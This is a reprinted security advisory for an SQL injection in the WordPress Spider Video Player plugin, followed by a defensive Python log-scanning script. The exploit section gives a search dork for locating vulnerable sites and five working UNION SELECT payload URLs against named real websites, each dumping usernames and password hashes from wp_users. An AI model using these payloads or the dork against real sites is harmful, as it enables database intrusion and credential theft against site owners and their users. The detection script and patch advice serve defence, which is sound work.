WordPress Spider Video Player Plugin 'theme' Parameter SQL Injection Vulnerability


Published: 2013-04-11
Updated: 2013-04-12

Affected systems:
WordPress Spider Video Player < 2.1
Description:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 59021
 
WordPress Spider Video Player is a video player plugin.
 
Spider Video Player 2.1 has an SQL injection vulnerability that an attacker can exploit to perform unauthorized database operations.
 
<*Source: Ashiyane Digital Security Team
 
  Link: http://packetstormsecurity.com/files/121250/WordPress-Spider-Video-Player-2.1-SQL-Injection.html
 *>

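Test method:
--------------------------------------------------------------------------------

Warning

The following program (method) may be offensive in nature and is provided for security research and teaching only. Use at your own risk!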
##############
 # Exploit Title : Wordpress Spider Video Player plugin SQL Injection
 #
 # Exploit Author : Ashiyane Digital Security Team
 #
 # Plugin Link  : http://web-dorado.com/
 #
 # Home : www.ashiyane.org
 #
 # Security Risk : High
 #
 # Version : 2.1
 #
 # Dork : inurl:wp-content/plugins/player/settings.php?playlist=
 #
 # Tested on: Linux
 #
 ##############
 #Location:site/wp-content/plugins/player/settings.php?playlist=[num]&theme=[SQL]
 #
 #
 #DEm0:
 # http://www.voyager-channel.org/wp-content/plugins/player/settings.php?playlist=2&theme=-1+union+select+1,2,3,group_concat%28user_login,0x3a,user_pass%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52+from+wp_users--
 #
 # http://juanmontoyalopez.es/wordpress/wp-content/plugins/player/settings.php?playlist=1&theme=-6+union+select+1,2,3,group_concat%28user_login,0x3a,user_pass%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52+from+wp_users--
 #
 # http://tremendum.org/wp-content/plugins/player/settings.php?playlist=1&theme=-7+union+select+1,2,3,group_concat%28user_login,0x3a,user_pass%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52+from+wp_users--
 #
 # http://generalcapitalinvestments.com/wp-content/plugins/player/settings.php?playlist=1&theme=-4+union+select+1,2,3,group_concat%28user_login,0x3a,user_pass%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52+from+wp_users--
 #
 # http://www.lancssa.com/wp-content/plugins/player/settings.php?playlist=2&theme=-7+union+select+1,2,3,group_concat%28user_login,0x3a,user_pass%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52+from+wp_users--
 #
 ##############
 #Greetz to: My Lord ALLAH
 ##############
 #
 # Amirh03in
 #
 ##############

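Recommendation:
--------------------------------------------------------------------------------
Vendor patch:
 
WordPress
 ---------
 The vendor has not yet provided a patch or upgrade. We recommend that users of this software watch the vendor's home page for the latest version: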
 
http://wordpress.org/extend/plugins/player/
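
With no vendor patch listed, site operators can check web server access logs for requests to the plugin's settings.php that carry non-numeric playlist or theme values. The following Python sketch is an added example, not code from the advisory or the plugin; it assumes that legitimate values of both parameters are plain non-negative integers and that logs use the common combined format, and the log lines in it are constructed samples.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Path taken from the advisory's "Location" line.
PLUGIN_PATH = "/wp-content/plugins/player/settings.php"
# Assumption: legitimate playlist/theme values are plain non-negative integers.
NUMERIC = re.compile(r"\d+")
# Request line inside a combined-format access log entry.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def suspicious_params(url):
    """Return the names of playlist/theme parameters whose value is not numeric."""
    parts = urlsplit(url)
    if not parts.path.endswith(PLUGIN_PATH):
        return []
    query = parse_qs(parts.query, keep_blank_values=True)
    bad = []
    for name in ("playlist", "theme"):
        for value in query.get(name, []):
            if not NUMERIC.fullmatch(value.strip()):
                bad.append(name)
                break
    return bad

def scan(lines):
    """Yield (client_ip, parameter_names) for log lines hitting the plugin with bad input."""
    for line in lines:
        m = REQUEST.search(line)
        if not m:
            continue
        bad = suspicious_params(m.group(1))
        if bad:
            yield line.split(" ", 1)[0], bad

# Constructed sample log lines (documentation IP ranges, shortened query strings).
SAMPLE_LOG = [
    '192.0.2.10 - - [12/Apr/2013:10:00:01 +0000] "GET /wp-content/plugins/player/settings.php?playlist=1&theme=3 HTTP/1.1" 200 812',
    '198.51.100.7 - - [12/Apr/2013:10:00:05 +0000] "GET /wp-content/plugins/player/settings.php?playlist=2&theme=-1+union+select+1,2-- HTTP/1.1" 200 4096',
    '203.0.113.4 - - [12/Apr/2013:10:00:09 +0000] "GET /index.php?theme=dark HTTP/1.1" 200 512',
    '198.51.100.7 - - [12/Apr/2013:10:00:11 +0000] "GET /blog/wp-content/plugins/player/settings.php?playlist=1&theme=7%27 HTTP/1.1" 500 0',
]

if __name__ == "__main__":
    for ip, params in scan(SAMPLE_LOG):
        print(ip, params)
```

The same numeric-only rule can be enforced in front of the plugin (for example in a WAF or rewrite rule) until a fixed version is installed.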
